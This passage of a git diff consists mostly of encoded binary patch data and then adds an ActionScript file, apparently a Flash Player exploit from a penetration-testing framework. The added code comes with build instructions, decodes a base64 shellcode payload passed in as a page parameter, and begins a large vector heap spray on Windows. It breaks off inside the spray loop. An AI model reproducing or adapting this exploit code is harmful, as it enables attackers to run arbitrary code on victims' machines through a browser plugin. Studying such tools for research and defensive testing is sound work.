zt4tO$1;nbMqxJB@{!s(tE==@biZB7FvNWrEr5J8IUw>Z&KMe~|DAvW@r1LN5hbBbk z)_5KNFHY=PN-WfcZ)t%Wdol4H_vA6u_w>8Hr2wEz z@^Y7ld6JZQ=bX20>*%u&DNPBv@RHCP9>QWrOx(rh4CE{$`Atb8 z9$Bzsi+^+k^@EC1ah27*WI1#x+^>gRIW^=K_t#WF%OLcs;2#q60O-PPle?H=I@YC0 z_P-jAvy4eHXLp_MUUDZQ_r5E;P#Cfwov1s8geRgGh*?resQsLuhdQff97NbeH0HPg zEjU8(#HhhVJ;5r_jzG}`xrkosPMM!YHoa=|@_#1g%)a>A;lZZXYWJs_*=3=WIn`B4=x=NjQ$D)0Md<|lPV+o?;|vF^jX zg1iTHTo8duYgDAF6z9BQLspMRT7#q*V-Z>f-Gsyo@mE;|Nkm) Fd;sX{)7$_6 delta 17981 zcmV(tKZvAx0kv--qfI{j z!3Vi&_aG3^#;Vu`5AVO?6oc`0MP>oGOjZ&9)>292B*f#@&KXe@6d1nP6HLPm9ZU%N z^3$AOCZF2QW7A^p{f&o!K&~Ms-W@>x z;j8oNtL4)rYP%v6Bwa3^`Z0RvPY$mRo7c2m%e;L>^|8!6Uh-nF`vGhT7dhN9&QkKz zQ_t9Q8<6cci0F(q?(<7j4^z$A?44@}q__~r*Jdma%~~p!hTYFrPaf$2MZJY$0iWKVV>wu zP0WW{pi@AFgc@Jfyo8O@ehVWPe_*`)N27Ji(bM7szznbvV9m0F1Ibs|Pt|HwGvLBJ>Hi;=g9p>7e+2c^l1`pto9w2+ZN@FefXsxa+hdZny3HnX4Cb>BKtQ%^ z1QDt{xAj2(@@?;wT`epua5u{r=gIQ}5lDanC1EUJ<^I=<*I|~3PLrYbG=$1lM5?eq z=cx;gWx?+Redx-?V~AG&T4}ILpf!v=PDm0#7ZzQ{qav5bB$#35VnQ+0Wh{N>y^T^2Iy`r&QU7>{UYOd9Yz)~iAX)Jh$6H{ z%}umLkM3~-3x*~{fKI{% zv2qgQcZQ?bwth8Z(8MoNsq2=bcdOXnT)0^P1hI`l;D_URe}adE*&@6^GY4^nLwADG z4YIs-gMg79>$E|Y0aI$(J^0>;v57to4zRyedC4th{10a}fk%E1{oEj*sj0FMcry^n zgsQhmdA*YY{kNY}AfR*F@oGO1!(>0ic@qp|idiVE!Wnig&Uu56HJiCGcHM$zEk@b(IGfFL0{q~W=iY||MPAinvU$ryCpo^lJ4eZHiH6cQ-8oNJ zE9o3PQ}H_ElchVISM}ntmgEdve$q5rJKeM&-AQ>e;+XkWR;;gr)OW(Buc-!xo zqsYW5YiJF|Ne<318^LI7NZa-N;x|`IVqm+tV zhlGRa@~QZHrxP#cQ5`AI>P0|TG^W`2?*Dy`u}fM?$96@b!5yFS`{HF&k=<^rwdE7h zlrFG)mV2%GlCYSnUMQj8tz)1n(fI_Fm#Gw& z)Jy@+f7t;wQHEeB7MvH(7fQSjeNkrWEjLMObfrd&x;_!fhO zaBbmR1}Wq>){?-2dLbQRb(s5p1}SHx;<2df5%N~a#RYby+mn1DZpgLkOGqpPG9@mw ze|_W^DU5lAPbEEP)aBDl@gO`PIs)+gkvkmDhImc0&FB%`wj8S4nk zAU>ei3U2wGf)U`m(L9Jl`_^V=bYs=IPpzcC!^Pa}h1qc({#G>nlyq67kBZ}(ch5tv zkJ{I7`@!Wcw*e-X^vvDxz6#qFBuCddlPvjxxAd#EI^2DS4nh@>GLSW~*-|jzfB(nA z+D%;S3*OC@HaWYGL>K8dAy3Y@*v`BaE!81rV^Q+q^qFs;{*`c*HH0<^#zjY{Jr zl+D(-9~5X8wj89w@cnRmvbi=;Jks=s-|k@3haY-{0Bg=5Hx^AvWu-zzd%!KwWkc+mwww^Mksp_e`3-wIMQhvK5em5dD=+gT^0`8pmK?+5(|+XdJ-3@?C7d*a}agi(ox$N^4VDisW*`Fu~54dClb!hS{+%KX@5A{eP%-^z6 zS+Msk58zr;v~~$Lb%<-C3UABw%O{7cz{uOASSO=&|8OD&l?^k-v6lIZf3!E;vIaNk zY4phscuSY7F#ZmYfB*hkewM|?|EPXXRp7^^nqvV&A5ZSc7C{rmWRA+|Q8%?()kE8E zRc_=WzBQic5$E8}No?d26}~{QtZl9Arn<>)mjidGTX~zzRw-P7yJ8XAG|PMvgcfp6 z+?N%WOzdui&ZR-YjaqDSe>>{Y9@`v?b-;`u`Y2SG0jfi_8PNnuHLws-9nvIhTVfa! zj^6)_k=%Srde@7e783ikWLuOJUZ>Z5l~=j=J7eyGH6x}lZ69AE2FZ4N&!;|yS@Ljk zu1e^Zh;F~)m8#pv;35tfcS2V5VP;PZprRimljmD#7f745F6)R^+)FZP$ znT&uVxo)WNEFe&J$DUNk=oYNAtF)k|0Wa&7`E0MHJs!0QH|H4xtnH^zTe0Wz57<(F zZj_OS3#kJHxZT8{gHLF6#Y&BIGgSggEftrX!%|EN&HAXfoFMi<|#>6+a1b9w>(e7N! zC=WA^@>QQNs*v5&+0>DzJr59ZdzaCzZ3BNt$WUnAs+pCAQ$<+p;(1i4A?=}5GZbO8 zqB}!PncGI8&C`biY|Z_%r~gyCN20-0;j2Mbj6Vp;5=gYTf0g8o2=Z-eiW04HwaDur z4JH1E3xaISrWG`Dl3I$Bu07~gOlto1=t)26u`dH|ntQLABk?)3UjX=r*5AGT3qBW9 zqrEhCwKQbA=U}7YB~F*oulDB!@#7s>1obIa)BuTB40R@YhPR=Wg4v+O+QYrOn~wIG zo6UBfeF6IkfAH@D8xOxd`hHl8A-4X1LDok-r0kqPq5Kl$2F8ubtI1Nhq}p)snK7D_ zqgkSYGscu9N#61E_Xye#IXcmV_j=7d6@sUHH%Nv35gtuU86EIx$}Xd47ry9B1-kL9 z+N25|?zUVoW~A@eOR{Ocsnx2!-bfC0cEZg>#Z)|@y&JH`IRa0j8*7`Y0D;CW24N@*D7ck~w<#uATqP$d{Z;w^ zLL=dh#zuZ4D^zQ)*3j6!nD>*(2vo4Nk$RWwGx@9p-2G1G^DouYGE@9a5*PF27G55C zt!a_ffA`-wKG~bs8GtrOS~B$pbt_VmMV7vYVS(^GGAm|QbIJ_Kp3hv~w24bEN?eyS zc&hPF#*b3P8-d8#!mE^7syPtH#`{jvTztROK((q6_)I%J3&1lm;4geqf+k!zaG_(2 z@ZVOllInMFAcpEK(WxxiS%hA%7+8w3lRd$gf3>}Fc_)8{4O*Z3gjuP}2xeBo8vvr6 zaD?x(J5WWT*&Ubg5=XOk60jCk_b)%dB|08Ah&$A($}cW7K9=tC4MDKdbT{hw2^A6F zMiX+{VnVA+>1*xnKaIIFqc!;RjNGN==w_h#Nwe?Jt6;D04~!Q|0k9;Tu6S$dK>i=y zfAavFB4Kf*()SQD zDkhvp(VLD8HGZuP+?`2}71+s1hlM2BkYKb5)7VPUG5sTFB;GnPhKR>RuKvCjjpB8* z5grbuN6OaghzdD)zltys2OY@f0jtt@e=lTqCQ64#e{xZ=(qi9xZ;d8j$EFWd>wC80 z`k6!O{k!n-oJ5UlxK4tQ35|Lgds?K1s8r7%ww*Vi5%u6Y^o*!Xa#vgq0Pg<1iP$3* zZMP?8YvQH1j0Fck|?H!*hTe}?kq zQ4(3%fn(fW!_1SPUPETln5ZoiUvK8fxylIc!5PXoFp}%)DZ1AqW@pp&%-l2zrXYpa z{N$O%43ajr%nB_35a5Q~$rwd`Q|=%>j?>MHM^dmDStY<6u@^`UsA~MeSwRKOM zT4Gt9kai|5-tWSS;RM)4uTV78e=Bg8%>TNHi+iTH$4JX`MOU|cug*h_Fyo$Sch(!!P?|_@=3WH@U#)8UV4DmjR8?HwAE@4S=-L@a4&E{DeX4 zT_sK_=?7_rOvvqbUNasuc;i(n?=U=!5&Mx57(q!=G=I+j09_PvyW#mde{PhEzg31I zD0#=kRsD}XhNF7!+xu4MIWoCIs&e~VV$IJ1NJ;@r_N%O-BCx-aOo5`BG6oM<2J`I~Nr}C_q ze|x%luPK^okgu^MJs*}7e?TmDNWOV<-;Z_gKzx~nK&S9Ge&M0!bCnfGtb4oaIZz6F+T%CZq zB2nBQ)m>4ObvT9oe=;PGg?@FUHhHJ5t-=dXj5U4Y!>;#veSf;{8jhkYj{Q{ zeWt0m7i{rP>m9euZ@YZz+KZyrS|xsTh$O3RSZo-&!U_!8WR<4MlOA|W?XP$z&S=^l zJL9W+g$4IQ%ZJ>0dR(PSV*2trG2{V*FR;T2vLqJa7?c4;yZDhBOd)V@g51z*-1QZA zeBgBGq)AOif7tj3n-26DN29ZOKwoJ$uE~#>4I?)FN*~uX0!Ta>-*lIS9^+^biDV{} zPAXfaV*ik|+Yf4@CHr_%`Q`Z;cKzU)Yi`uZsp`2_f0U(n#z|lAu)}40jBl)N^QQTp zpHCIlN)~HT)eJrmZ6TSIBhwjE#4$P-^n?HQi6S2`D0ZTEP2vq{z#F%_z1#re54qnS zwujZy-Mj{Fk+|;iAAupQ9P-Blm>K-;Wmb*bcp<`k1F=ywzmUd ztF9W(f6P6#_JJPq495D-<4a6Hn#jD~F%d7sJK*fiS67cmKK51yz~I*{n(M@U;ADV=d%0GG_x48k)2N)^N zJFVk_x?4Hz-Ip1^YA;?W0ykR{C)pr&Su75%+`bpnE4sF!`^q?3M*)K%Z2cX#i-PH| zAIwCaw$DZ-2aqX#+@rPo0PSetvI+#v9iPRX8jfwpdqW7)^tJOv^RFgUX zG}rsdxZ>d{Ij}oswu_R0>|S3`ba zc&=5#q88^^bLe(m6J3Uw@CoD;5`xXNEN>8YP)!1A_p;M{WyXT!9+(H0D+&Ge9*}_r zRiehS^eVpg)n&9hpg*t?Q{@2ENh_3d6{WyVroH+j_+)up;E>@ka_!ZC>EA5Ef5@a~bx05YeLCY2ZEwZnddjB@L+WQh>x%`b&%^E$$7ys5Pw>=oKZkx{nd( zdTkO*)jh5>S0TDve^t7&I?SuXesy7ZSnK&z&u`r0H0qB`u{%JP;Mz@*;PXhC0~XLA zDre>*(JR;plb#D};LJThIG`=rf2(74MOfH{LN8j@#JXSC8U;Ow>)zXdBWC>=Y;Ft7 zdkmQrZ;oVfGblMXdQSfBQ7>9YHlD0;=fuB_p4Z z?k#1E`=nZm(12Zkahqu| zeH^w2Y%&*iLSEOB4qgsC6v$N+hB&(~JSk3&%&fn*Cv+~FT9Bz-jRP;bM6>mIv}q(_ zG4_m87c9J+f02QJS+HQ84kqK@icHew^3~7XIr}M~Va|nw{Pqs7K*(7jP+Z=+b{Ku+ z?4%3Y0w#!nDx$-9MmKqtbL0wObv!b^%Rd<0WR$|^7riTe)gZuzCEiO1PI>cUX^;u48#_T>!c98vVWdJ{Haq@ zm6*KsyB$>9Zs#+~{vW8fvepLjubB*#VK0wl^791ck;zp#R#F^PU zmx!1If2dkQ@nQz2gts>^Q=14kzrhaOfWLQnm*HH0$_l{)$(k?D4=tRO;jb^f`Def{ z1V@=5vXiARBod$PEs1{o>UdsfG`Aq2E;11b(NWB}%q1?PT8%N3sPuOWfL%&cAS{`C z7=G@fqW(R)q#qGYF!d5qp3@bTmvH5ERs}Kff6M^{Fv~BCfHI6YE15`L$lLuXwDYD| z=L;d!%U?e3SreRp5U5E*2079%OEPp*cferH=opUndqs7gY_+2Vo-;z@+^6fm{j2mC z>o??bqO2xa8sAJW)6!#$rHlNPhfCMf^x?$FRj^Y!s(gw}EyEmf!1q$+yhoJIIhqin ze{=sG#C8&;{i6+cirG7{p%Jc@?t!a+CXXRkXr$7gHToTQ@;TUySt|SGcu}ND@H8wP zlxb1?&dk=!)+~PhtxnoBD@-mAvTKB_u%JE&>8$|UZ)qTf&@EnxU=VMcy5tjMkUi>= z+$#B4HIDI=Ei&(ZFdYxC1L=`Yoe^v8e_krKh2^81gH?`|CT{oWr7^KPI0asL7E+Aq z<3f-ugk{!<2}4@b?27Gr&>HpZ^mP~fTa?|iCsn6)#RpBkCLhc(^9=}4*I7JYnC4$W zrMyZYTR{`UoqC((EsCWMn7mW8T@a~R1Xi{wJaJnZZejC1ef!!knQWmYJnbj+aI&agXRrZ6V>m{24ZlW?CYQc-`HfPRfBOT2pys*oM2_$?MnBxBu6Rp8K*o~9H15g{gnkMP z4>)t0(Nwps8jDI*dF{I=%2pl zwaNmL9=h@Dk$?jZFAODhb(3!WqbY1I5Veg+ji|Dro5amgY*t0w94<%XaTB%^A*5uAPRK@TMtT#T#Ow=HN+SmrL<@**R4rHZ~y}gAb&C*cSnSjhxr(6F9dr8x!vFlh9(Rk-|HKrzE5^6#oQWtAmhC;HD8k93zY|fy z4D^OZ&#kRgfFXHGe+dA%`%I4mkGF%-PjrgFs_3<{Un;aMbNS{o`+xLnKV9Jv3*8I0Fuo+?h6a z@lE~pb~sJ{+WttPv zRi98+|KBncm4q#l#)uaq89)ItU(PL|LB=k$;jxxZM0Sk{5j3JOO#ZnTm%KQAWDL5w z))m{L-jTl*+Iw%)@ruTEzQy0$r7bunzcnAO%nI)Se=Q;wC|{*q(8^vRj1g0>h8Lpj z9p9a;EYQmx!mW1k7``~mw~k=kNf7{mZh4-JgkRQ|{c5bk#~BB>gAF|tR+6MC1%9~! zGT`2TVI;#{n_HqDU(qX|s5`7wKwiIpU(m!UY+{hC$6LA?5VjG7k4A%T6YS;w9<0~- zv_MDBf5q1H18Ef7PS5$^v}Pi=MlQ=;-#HF(hfgknXBFzg2>`wVSqx-?e6oMwoo=Fq zVVtbaU|8PMjJu4)ALG>+b9UnD5K+LvV??}MKe=rl^4J;7lQz}K|bUsyvuB8W4q2{2HJ6>dDAEr6 z96JrdZt}#k&Q>tU^9IOGnMfSyg;1HvPG4G&U`SEFw_Mm;w)KE_^x4Dd{YfkE)q-cn zf4(&ur3cpvVff5nsck@?rdJT zkWJ~P(64>4jABw@9^G76g75TDG`f8@%j$sdy+;}5m{}qT0z76`n(=FEP>yRjVP3Pk zIMW`iYyF|b*@RFYoK%T^R{?%0VUKXGf1Jsht;CW&G&%Xrl{!9{wH)(IRk!*&O28D3 z%@P|S3)KztTX7BLHJ|>nOnFq52qzogSPfQ3x+*LaMa+>sUsnpyh=%y)?6^5$Bgnzr zwj0H=ZwK8fgKpbvrHVUFbsH_d6tgd-D%vdGa=;~3QXns{a(;i z2ENBvhA4-L96p;FDYADQn+;fLe_D8sXhS32N2*=#PNxMN<@07}p3NWm5Dk^RfgR4R zD&6Y6a?;esI~JuV;jrU2QTpm|n}B(_xWFO>rC|9uy#KXSo(o#s6JYhJ(K+8h>-`2$ zoM}2h#u%|z=Uu!WV zcN0@_sR?#nJYDSS>vWvTe|XH-#MzryOo5NK?5#(#|uO+^@Fn zdcPxbSdyUhWbF$1@q;e4G!yX&?CAa`&x>E=dTlbLCx&)m@y$JmZp7^#U39V+yW+U~ zR<<520YVB^vvKIK7c0wTp9F-1XZY>TBktVXA*$xWkn7$j{dEajfA=WMbjw^CEbi!6 z(9kWBGNvkxe&SX>qeGqzv1VrH?wg7%bAyyr%HS_Vy~NHehpQAw7VW20igslGPWkBzhv-$`&FGv1`L1V{XuZ1514nUs1#FHDPpta z&yj3DK6ITs9bGsPS|Ow{T8kLvlHSJMrfXo(Vsm#|CIs~w^*x7#V%~vntk0`TK1Cs| z1H-y~spZntt=spjjlG?pNEAS@O!T4p^*kE4aN}G0L6VNze{iSQD4kPcRD4BJ^T6lo zY)D4`F=zA1gjZXi*v$1s)~HeycSNXgRDf+nGKFQ{UK<6S_E|UCyTTDVRhQL-A6`#y zAIHC7XcX7rNOSPs&RAfLoZ0gmB%vxRfF*J;xt-}Nw_^nv@c3AJo& zV-#oY+vop#e~Huuv)UH1dMohy)otr=Ll|FcQ!C49cW!hR>XD=Zj&PPw!+8Z#20sMq z=^s)6pSkrz5OQgJXFMs??9iP31p~9%e6AMBRx6;n{qjmjl~xQY=%laF&uf>_Ug}2q z{!MXu(*9q~VvPDchPP}2^s_}|5o>juu~wN~wy})EYtI2|7nw9h#wKn+0%q>Q5{tHYNlX&Rt!^R%D$ai4 z0ep!4A{dDDP`@Va>)=E4nAiY}!%%^8=>e$47B=p7whApcB3;uE;$h*6ab?|?3&WL0 z7#<@7e>Lk|13ejOIO@!Wd-h?=xQMiH5@dB8>wQ9ep_I+9(meH3iS03+5|UF~xW5p? zB8ZGq8$Ujde=G|M9f6Hv#4eADXotyrncUi$KPSlyGxgt-ba#Np1KcUL9TqoHhBX+f z;K;W!V3+URV*Mpi4Td)nEOd_Cm|?C=Q)9N5e^l@GU!4}i-&h*Uv>CoPYij~%VmPP1 zvRP#K(d6UY2o&>8`BD{T-nclVU&#dOl!6ux()zj-Yy2mqu^^ZE6pLfuuZ2Jl^AiG# zzm8E=G;fmEN3Kl0+ACwZ24hjOtMrR&Kb=OSWnKRdH%Vzs^*>~hB3n33&IK2#PMY%; ze|c}rt7UzAFpB`r<;HqZ7Q`Zi+nK=$0@QWpqsTl6y@o1DhZAZs^jrAyYdV%GPjCt@ z&Gx<^#0K^fnK@jb3&e;$c5<1?S-XgLAA441jq36CuR8)ai+zz4f4&}A2>7(`_r8e3M>wA@>M@~Cj*$nKBYw=< z|GhHjV_mgyfi+hrlUclbD(i{JWi(@jqUA6`w!Pu|P?|BW)q2|^C$0t7G=m_S;i(Q$ zr=VMZb{5!T@p8~LoQ$pM^*qzq5lYR z9NCuoj$`g-wctk#FHkIj7>V*M%8^5912{UfM0L?3P6s%G8YJvpLr%7*T;if=M4Uh`+o2k063NEwFYhYZf)Zo5@=o_V{oH_PB! z(a+UW8vD|HhOyHkq99N4S}wE4=lsGn*Av|UMIpu-e)MMGUF*s8g@}rfe-@tq1TdgC zZ`iBN+8m0fR3Vykx#7`-H&I=!bK@hZSx<~GuO%pUwJ5AG`$3PGEypt!wyLFeKy+JR z#`%YkcgJDt)cP34L?DHKlj--is8!AyHuB!HDuXBpnf7@^w``os8E%$xZ5wicbYR-| zYMea*)g?IRm+olM3@ZOLfAdka6L;Ep`5Cyb;;tGN0z8pSXwYakPrGPh7P`` z&grnqKw7(5U?1jghmUK}(UWM7+C&Dyt>^G?n`E^_zN1 zh7|z>>sn8OS%KPIe`wv)Wvgh&6N%UNEPPLC{kEy^6X%lAU`@16ntA;*+RR)n?18+3DKm`7r z!s%J)1z*!ub0SpjT4zN^?hQZY-?jspzL^tQQE+cutHQKQe@DcYZjhgtJr=g8p~_3Y z!C~sUE1URKPyxB2klAGG@8OZBneuw{C)#(Aw2g4Xu+=~v{B}s+_73C^xd#PGJ9_|p zWA+2Wn`0g}&X*;=faLxI(x9Efp31o;wI&uT)Ww`He@GD4Xc?47F8^SZ2l(GNri=du z2HroXYas34mGybV31aH2n=sug$H!6Of`{PiaJDjtTnS=(e)k-Jlo|h<_M>KHGJ$Ro z?E@J}ZP2(nyj?Mk)0X274zds2^ zS~SVZe-Mp)40DcpjeXkg#lu+3fXpTT^1VP4_i~WTNvbw*C+?XoRg{BubCPPj4XuVpSl3f(dc<|l`E0kJ zwS}lCyi)ocZXcdc|MmH?sE$`d_~OV2jGXf5f1*|mW_t}W3i8i<^pbqN`JNNoY16px z84-+z_W2E}!U0z5@6VE3?kNv^LUez*{(Mg<+Pvyu_LvKZ~yc`Wk!*am{#wa&Fb@go2!>29@Z^c zf3NQrOf6KIjyj4TigTFzbZGcgvI?Q-0IJa0B6kbAx;TSb)h+OgX;$Ar#i5y?MEzH3 z!T*7plr0GT%)_c`k~u2La$i>UT`Ff8oqD z8ZD#-qVtuko7>1!f(C)n+m8q=puuK2X%Q3GthKlG0YWs!;E>!qt-|6ckV|A3$+W4`ibfxN=zn z3Y%e}PngZ9TQR?uCLSAnKlM`p$rlw`9>8Ssyt?(j7q}mIn7L0bH2V=Pe?K~@I35wa zbk&bWubMKim9=eWm}_ephZcQ!GQJEyo#pp`ltSv{uQnR3W>U^{ip~x2AiQZ%QLIlLIj*XAlO{?z$qgbuL)HP{u zjBRY6_t-|57dsx?;IqxDe^vtj^VKjN+NrED9D0XAhHHx;)qK$iJ{u?Y16s};Z$_Mv zBd?+4#S4X{?N3DqlLelk65Z$T3V**Um08(S2sB3HXK zw}2F0_q?%7h!Ldl44HJp zOeDP5^~BxET6ifSCekU@JmUj6z78ih!5W}c0cYH{lQgMQQbJ8#Av~QIUVXc_kw^LV z=p0QP!%q!`BAne6Lc&Xg6XS4HOMJShxo_E%bmZ+^(*oV|{7gxUtel`SF*zp^=te4IDQ+G`*yjP@y|TaqIQJq(L18Tl`(;h0l1hP_%5_a8nP)Oquj`-sN#jSwU8b7l4>XRt~%OiA-d^weX`gI8ios_uE zYO^>*B71Sm#nWuW6SlRT*O+S}Z4t6qWa-<>RnCZ!C=&qsz~wgiQ6N-eZ3&CVaben! z#U6QG)7dt|(a2p5z}CUn>6S-u)@xz86DVzxfAn}*VI)s(S2k`)M(oQ1I<*Pld&z+a zI5%Xq#=n6J-_lPUg>>{$^9YtEnju`g(}!D67Q*B!VS`!j{eWR4kWgjx`Aj)3zJzRp ziHI1|#BMH(qk;D4+FwWd@KSj?E|Rk+ZHsU&Yz1=Q4+YQDdxvV542u|plKbQh8IKg_ ze@Qxk(F^RI+Q;~uWvW-A0lfB^Kv)h<|I|CBFDsKzBSAFO4`iox0!B%pItBKcx+E?} z{I2yeyct>MiNFlbBx(%s^NFeX&GHH~AgAeglc2>E9a|tK@G9;$ovtlMKV?G+Tv3`c zE;>yXN+xT5-(omypH3es(Tg&jSK;+;e^Y-`SIMzL0hPuK@k4+itANMAzM_d;0zwz) zz3LtF|9dt|?vj9hW&8R_+w{=R8JDF-a$Urj;A%ez*caG;>$yCzEfGE95eM9Svs39h z{Npd%Rn19(lhCezsv35_%RJ%5;?{DJ<(NQY!oPL~iwCH@+h2U)glZg50S18Je?7mm z-v>!-Y~!{x6Gp(mL3i+^Z(%+30Y>PK)~L1}MBs?^niUAdNUs6IG;l9TxG^Y>+t`yA6pRS$u6 z*Z}WhiEV#D&D{6nm%{TZIVvgRn{{6CuBwvTU0Km6Ho!X#5L|q9Ry0lZ6u#CH#cX0Q z=zB{aIN@&!)cbj#i($rTcy{{R!DLq*q*>fI-o=zvc=1f5-ndUjaCjkuHB}0w4`j{5LH_P%*ajp!Q9&ENSoX+v1 z#cEX`@8Q1KlZTN!2b0cOcNMZSb$R`z{qj3Z5hw(4PjeMrbp3@Zf1#oG=~55!o5Vkv z;JK}7LT_}GG=H7i5%-|6v#VIyPDNKhhSeQk78jX1H5{!U8hi- zo0~6J3@K@Idpj8Ze-2zbj`qVcoWjMsxxMKR6x5RF*W{k z-Q)v(F&#otqXU9!q?`M;qIC(q1qe#3j{QfR+4vwE=UTj>Gm4D1NyLaU!;n74<}woQ z7QI5+k(|FRYlivTcg~IrA>NE7fkr|i5>LFG{%-)|#*ux|f9^3?@8w!$z5_0R$m@H9 zFV1rhixYZT7D4iU_&{<#YVbAGPuwx|X3egyq-$875ZPbvtQ;C*o}${M!}d|Ro$**( z-L00>pCY-x=PbQ!_m9a&8P1%jLkl%oomo*ekea&HHeX9if3WY6NAbpHiOaGnU*Ln< zL#k?Lmlmt|f32Rh!pLSh2?(1RG$j2EX670JiYWTCCO3XW25!! z<-E`Ve;kr_p8DI!$ciC3ZoSSF$Mb!Ho~sfkeiUMq_;VD(4>dKC*pdg=mHkoL%Za(Y zsAD%0>SaJG%O{t$53EW5j;8lmq%Pd!97DSO7B^vlm;GYgYgq2OUif;j9M37J zzvY)jOX*S)U!un~_)s;Yc|_&q$UfwjmcChBwhw-VvH9Ejc}>3<&N4Bw;LfbNe}Czq z$#MkdC;iVC8nSyn6Hdqk-td#S>gqf@`ujxiIFu*kI`QX`b0eH!EtP@3?>1C&)fy{A zm}*#=3L=nL!b8UA5bm_|YLmR$;|+~acFLE(As9ty4lGqADen;tm;tgV*cIS=8x75vG|4b>q|mpw)Dcn+Y4Z&kYyja5Vi zsb6@HS#yS*i{=|RAH~S{f1J_s_PXOi%0O$l3MP>T(L^$PFH5D}k_=J?J*)Urscr+5 z^&_|6X2amIO*Dc@R7$#f{#do%kGuio|Ll15@#|AP{AV9G#d*wyk}j8`c4=#RhwJ5h zKc zf!HwC{p5(y(FkCpGuhKTa2|M0you+Km>jOeA%ybU5blud1A@SpQ-hJ+2*&skQA`Wk z9@Z>kxtcy&XuQU|ULJT7vYwPAZ$xjndA!mZF~8Yuwq~(tCxS4eNiYC5sGVxr@ypi@ zsPFG)EzexXPR2Soe`d}7uXw1K@hw*6e@n4wp^Im`g%5bJKd*K^eD)Da_=Tg?TUu$y zM8>lK>ioq`@#+9xD~45h$WtlgZ8eL9Lf5V6^71#Hiq-61KJ1?oKWS zbub;5=pa$u$un8j=8{+Gui3%50;4&fO{EaTg@__N6XI9ue_#F9*LbMC2G%@*n!P@@ zEZ@-%^_a%a*;po~V>G%PmVn+}8Y2f9cf)&ylvKB7+GP5AyREf_jNpR-Q?+Hu9l-{vNg){^(Hf-$Loc zCcL!pnB>Azf0K5qmy|9TQcr)Q|32>DUN$z7(dnTJKftUGmbC?I`S^UFNXpE3v&t+f zo;Es&ibr3Ua(sTFt4E>L`2GXj4zNM)a*{;eB=S8_9dD)g`yf4#U3+6C4cYy6O7Rsb zV!Cdo+kb(=9Gh)ycSvd;l32G#kg9DlE`k$$?J*A$@YKMs=8 zg;ETg9I4R|^-WJMY*r%5z(XzSus>P?qAE$6j#OIQ8%k0?Rh|80F%@vS0Ln0<;1ATa zYrFlm;S%rLo6E`SaD+2A@)mRQs95ivx7IhH*ZR#;qD4WcS+d$&yXg%m**g9MFOvTc zt0ce^E%A@v_Lk56Z z98;Q>rbd)$1Mhn?ZGinu{eS3RJd!#!zkDURr!I3#D&qT?pS@puXfu*uC7Z>KRsA5R zsCi9x?=b3BtN7~`*gPf=v713Me)tmDwymf&FfduOgmE;Q`W{IRsgQ2SR=>2r6xKH>49aP@?Yb z5ZK z=n_k?4u8~go~BLo3`(8Odn8`lGRv6$qGn8_qeFOXSRlM0V2t|~uaCxOO3TspmpfFW zf2O|Fn^!yOyXoPA+e~X=O*!>Z4`j@NEkqf@;zhiRMciB>uqccclupoQ92^)zP+u5G zU(BtwcO6sO*SR(-&Hi&hv0}ltpoR~C65NRFmVXONujmu);xGx#EXA#A2PgA0ErlJ+ z*h%tP?ghZ4#JN4H1n(PA^$DV;qa43ppfES#W-S$yIPi$`p2;>L8e#B{Hw4o&C{4oX zr*|uj<=f;)V}tm8JVU8aK^>5=D$Vu8nkDelXWx&9op>fm_!lrFgP53%lBsi(t4ru5HHFq2t-T+9cn|y#ngNSV=H~Q{D4>6k_8$C>0 zL`{u3i9t0Rwu^dU&Mme>%f2s}1De(Me1EsZcU`=#=p_R*1%E&>2}PZKi4vhFR7fqr z&A)SVf77t+lMQ@naiW!_mC*}k10KS0(`z=);C$@aZcfb?@09ugY{#zkQy9YSO!6<@^(B> zIVp7z8(4S0-}n&29v0yL&D!7h8HoXd(xDPoY{t+a6*L}vtk z+xdeyAf!&75f}I;){;kHQ{BA<=YO%v_d>3nc)3KXyrvUioUiAEewN*C?BcFFFU!wE za$szSoVu+6_q@=%-ynanj`=Af=FE7?icVEGt+!XuQHWk>wUjGx#YzKf^3N_4cJMP^ zmBEzk<)@#D6A?39fEH%2_hVe%=I#E{a!h1LY}{hfJhsOxG@|!lGC#Q*dw&qF$38t6 zZvEIGzl zR55|WZelJSJg|vmHfVK3#V*fXOthu#B3>P$Z{qiB+H4$?14r<&?N^4Y;COv)&7gIN zYxoy^V_l{M-I-<;I5~nCUVrKWWvt33Vc(}@A~h<-B`15`umO8iOUiI0ti?-wk~ucs zT|#MoC&e#e0p>(=AuG_iC@M9pToozAPT#+CCdm-4k8ELbXW+eN^%BbH0t6Srzgs(# z{InI-G=Qr3+<_JTZ1X!*D&KPRmHrlg8NjioL_cZ#Vcma<>~(7t0)J5_#46o9ss>G8+kj8hQLVYRu; zH*QZvK75_s!Aw2e@N}@Bq$pg-qYnAa`*O%s?4U(VJDydOe}r9Z=13#8)(I_ipWqKB z8J3{O@gsU;1*@>6fG2AleR7m?tldE!vjaKwX^A=}UBF^l4W@>&OJl8Z%fMj&|1OWn E0BQ~KH!Lyme;D~I{DSiAbVGPJ`JUh1d%ib_Z$Re2nS&AA(`nQ}Cv*sU%@abp zg-V6->?xin#f2X)me@CMO+&c#(SWU}d74e*6!|JEvvQp$csAw1WEq!>mjuD|F`1Q6 z$~Gv4IM35Hy-$)dTxI!n8qW)81`nNf`;+0v5~pKJJI^e|x&#{<9B2*>kBx~qvLf!T zWp=G~!HU=WD9cKGK(`=pp1zAqG7ya92S*-})RkJ$yQ$Xt#JSXUaM!DI9_UkWF3cyz zmw~?qnhYYTk5F|P7#fvp+l2Rzicmx{(8ra8aYwkO!Ml>^xkI{cJM/framework/libs) to the AIRSDK folder (/framework/libs) +// (all of them, also, subfolders, specially mx, necessary for the Base64Decoder) +// 5. Build with: mxmlc -o msf.swf Exploit.as + +// It uses some original code from @hdarwin89 for exploitation using ba's and vectors + +package +{ + import flash.display.Sprite + import flash.display.LoaderInfo + import flash.display.Loader + import flash.utils.ByteArray + import flash.utils.Endian + import flash.utils.* + import flash.external.ExternalInterface + import mx.utils.Base64Decoder + + + public class Exploit extends Sprite + { + private var uv:Vector. = new Vector. + private var exploiter:Exploiter + + private var spray:Vector. = new Vector.(89698) + private var interval_id:uint + private var trigger_swf:String + private var b64:Base64Decoder = new Base64Decoder() + private var payload:String + private var platform:String + + public function Exploit() + { + var i:uint = 0 + platform = LoaderInfo(this.root.loaderInfo).parameters.pl + trigger_swf = LoaderInfo(this.root.loaderInfo).parameters.tr + var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh + var pattern:RegExp = / /g; + b64_payload = b64_payload.replace(pattern, "+") + b64.decode(b64_payload) + payload = b64.toByteArray().toString() + + if (platform == 'win') { + for (i = 0; i < 89698; i = i + 1) { + spray[i] = new Vector.(1014) + 